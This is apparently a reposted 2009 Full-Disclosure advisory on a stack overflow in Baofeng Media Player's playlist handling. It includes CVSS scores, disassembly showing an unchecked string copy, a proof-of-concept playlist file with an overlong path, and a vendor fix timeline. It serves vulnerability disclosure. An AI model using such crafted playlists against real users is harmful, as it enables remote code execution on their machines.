Baofeng Media Player playlist stack overflow

2009.07.28
Credit: Jambalaya
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Baofeng Media Player playlist stack overflow vulnerability By Jambalaya of Nevis Labs Date: 2009.06.24 Vender: Baofeng Affected: Storm 3.9.62 *Other version may also be affected Overview: Baofeng is a widely popular media player in China, and it plays many common media file formats. There are almost 120 million customer using baofeng media player in China. Details: The specific flaws exists in medialib.dll. the stack overflow vulnerablility is due to the way it incorrectly handle smpl file type which is a playlist.Succssfully exploiting this vulnerability allows attackers to execute arbitrary code on vulnerable installation. the vulnerability could be triggered when it pass a long path, and lack legal examine on the length of path&#163;&#186; .text:1000567B ; int __stdcall sub_1000567B(LPCWSTR pszUrl,DWORD pcchPath) .text:1000567B sub_1000567B proc near ; DATA XREF: .rdata:100248D4o .text:1000567B .text:1000567B FileName = word ptr -628h .text:1000567B var_10 = dword ptr -10h .text:1000567B var_C = dword ptr -0Ch .text:1000567B var_4 = dword ptr -4 .text:1000567B pszUrl = dword ptr 8 .text:1000567B pcchPath = dword ptr 0Ch .text:1000567B .text:1000567B mov eax, offset sub_100221F8 .text:10005680 call __EH_prolog .text:10005685 sub esp, 61Ch .text:1000568B push ebx .text:1000568C push esi .text:1000568D mov esi, [ebp+pszUrl] .text:10005690 mov [ebp+var_10], ecx .text:10005693 test esi, esi .text:10005695 jz loc_1000577D .text:1000569B mov ebx, [ebp+pcchPath] .text:1000569E test ebx, ebx .text:100056A0 jz loc_1000577D .text:100056A6 push edi .text:100056A7 push esi ; pszPath .text:100056A8 xor edi, edi .text:100056AA mov [ebp+pcchPath], 208h .text:100056B1 call ds:PathIsURLW .text:100056B7 test eax, eax .text:100056B9 jz short loc_100056E0 .text:100056BB push 3 ; UrlIs .text:100056BD push esi ; pszUrl .text:100056BE call ds:UrlIsW .text:100056C4 test eax, eax .text:100056C6 jz short loc_100056E0 .text:100056E0 loc_100056E0: ; CODE XREF: sub_1000567B+3Ej .text:100056E0 ; sub_1000567B+4Bj .text:100056E0 lea eax, [ebp+FileName] .text:100056E6 push esi .text:100056E7 push eax .text:100056E8 call ds:StrCpyW <---------------------strcpy directly with out any examiation. Proof of concept&#163;&#186; <playlist><item name="2.GIF" source="C:\Documents and Settings\Linlin\&#192;&#195;&#230;\2.GIF" duration="0"/><item name="0001.gif" source="C:\Documents and Settings\Linlin\&#192;&#195;&#230;\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif" duration="0"/></playlist> Greetz to those friends who I have long time no see T_T&#163;&#186;Pratik Dixit, Sanjay pendse, Winny Thomas, ajit.hatti Vendor Response: 2009.06.16 Vendor notified via email 2009.06.25 Vendor release new version <div>Baofeng Media Player playlist stack overflowvulnerability</div><div><br></div><div>By Jambalaya of Nevis Labs</div><div>Date:2009.06.24</div><div><br></div><div><br></div><div>Vender:</div><div>Baofeng</div><div><br> </div><div>Affected:</div><div>Storm 3.9.62</div><div>*Other version may also> be affected</div><div><br></div><div>Overview:</div><div>Baofeng is a widely> popular media player in China, and it plays many common media file formats. There> are almost 120 million customer using baofeng media player in China.</div> <div><br></div><div>Details:</div><div>The specific flaws exists in medialib.dll. thestack overflow vulnerablility is due to the way it incorrectly handle smpl file typewhich is a playlist.Succssfully exploiting this vulnerability allows attackers toexecute arbitrary code on vulnerable installation.</div> <div><br></div><div>thevulnerability could be triggered when it pass a long path, and lack legal examine onthe length of path&#163;&#186;</div><div><br></div><div>.text:1000567B ; int __stdcallsub_1000567B(LPCWSTR pszUrl,DWORD pcchPath)</div> <div>.text:1000567B sub_1000567B&nbsp; &nbsp;proc near &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ; DATA XREF:.rdata:100248D4 o</div><div>.text:1000567B</div><div>.text:1000567B FileName &nbsp;&nbsp; &nbsp; &nbsp;= word ptr -628h</div><div>.text:1000567B var_10 &nbsp; &nbsp;&nbsp; &nbsp; &nbsp;= dword ptr -10h</div> <div>.text:1000567B var_C &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; = dword ptr -0Ch</div><div>.text:1000567B var_4 &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; = dword ptr -4</div><div>.text:1000567B pszUrl &nbsp; &nbsp;&nbsp; &nbsp; &nbsp;= dword ptr &nbsp;8</div><div>.text:1000567B pcchPath &nbsp;&nbsp; &nbsp; &nbsp;= dword ptr &nbsp;0Ch</div><div>.text:1000567B</div><div>.text:1000567B &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; mov &nbsp; &nbsp; eax, offsetsub_100221F8</div><div>.text:10005680 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; call &nbsp; &nbsp;__EH_prolog</div><div>.text:10005685 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; sub &nbsp; &nbsp; esp, 61Ch</div><div> .text:1000568B &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; push &nbsp;&nbsp;ebx</div><div>.text:1000568C &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; &nbsp;esi</div><div>.text:1000568D &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp; &nbsp; esi,[ebp+pszUrl]</div><div>.text:10005690 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; mov &nbsp; &nbsp; [ebp+var_10], ecx</div> <div>.text:10005693 &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; test &nbsp; &nbsp;esi,esi</div><div>.text:10005695 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;jz &nbsp; &nbsp; &nbsp;loc_1000577D</div><div>.text:1000569B &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp; &nbsp; ebx,[ebp+pcchPath]</div><div>.text:1000569E &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; test &nbsp; &nbsp;ebx, ebx</div> <div>.text:100056A0 &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jz &nbsp; &nbsp;&nbsp;loc_1000577D</div><div>.text:100056A6 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; push &nbsp; &nbsp;edi</div><div>.text:100056A7 &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; push &nbsp; &nbsp;esi &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; ; pszPath</div><div>.text:100056A8 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; edi, edi</div> <div>.text:100056AA &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp; &nbsp; [ebp+pcchPath],208h</div><div>.text:100056B1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;call &nbsp; &nbsp;ds:PathIsURLW</div><div>.text:100056B7 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; test &nbsp; &nbsp;eax, eax</div><div>.text:100056B9&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jz &nbsp; &nbsp; &nbsp;shortloc_100056E0</div> <div>.text:100056BB &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; push &nbsp; &nbsp;3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ;UrlIs</div><div>.text:100056BD &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; &nbsp;esi &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ;pszUrl</div><div>.text:100056BE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; call &nbsp; &nbsp;ds:UrlIsW</div><div>.text:100056C4 &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; test &nbsp; &nbsp;eax, eax</div><div>.text:100056C6 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jz &nbsp;&nbsp; &nbsp;short loc_100056E0</div><div>.text:100056E0 loc_100056E0: &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ; CODEXREF: sub_1000567B+3E j</div><div>.text:100056E0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; ; sub_1000567B+4B j</div> <div>.text:100056E0 &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; lea &nbsp; &nbsp; eax,[ebp+FileName]</div><div>.text:100056E6 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; push &nbsp; &nbsp;esi</div><div>.text:100056E7 &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; push &nbsp; &nbsp;eax</div><div>.text:100056E8&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; call &nbsp; &nbsp;ds:StrCpyW&nbsp; &lt;---------------------strcpy directly with out any examiation.</div><div><br></div><div>Proof of concept&#163;&#186;</div><div>&lt;playlist&gt;&lt;itemname=&quot;2.GIF&quot; source=&quot;C:\Documents and Settings\Linlin\&#192;&#195;&#230;\2.GIF&quot;duration=&quot;0&quot;/&gt;&lt;item name=&quot;0001.gif&quot;source=&quot;C:\Documents andSettings\Linlin\&#192;&#195;&#230;\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif&quot;duration=&quot;0&quot;/&gt;&lt;/playlist&gt;</div><div><br></div><div><br></div><div>Greetz to those friends who I have long time nosee T_T&#163;&#186;Pratik Dixit, Sanjay pendse, Winny Thomas,ajit.hatti</div><div><br></div><div>Vendor Response:</div><div>2009.06.16 Vendornotified via email</div> <div>2009.06.25 Vendor release new version</div> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ <b>[prev in list] [next in list] [<font color="#c0c0c0">prev in thread</font>] [next in thread] </b> </pre> </pre><br><center> Configure | About | News | Donate | Addalist | Sponsors:10East,KoreLogic,Terra-International,Chakpak.com </center> </body> </html>

References:

http://www.securityfocus.com/bid/35512
http://secunia.com/advisories/35592
http://marc.info/?l=full-disclosure&m=124627617220913&w=2
http://marc.info/?l=full-disclosure&m=124624413120440&w=2


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top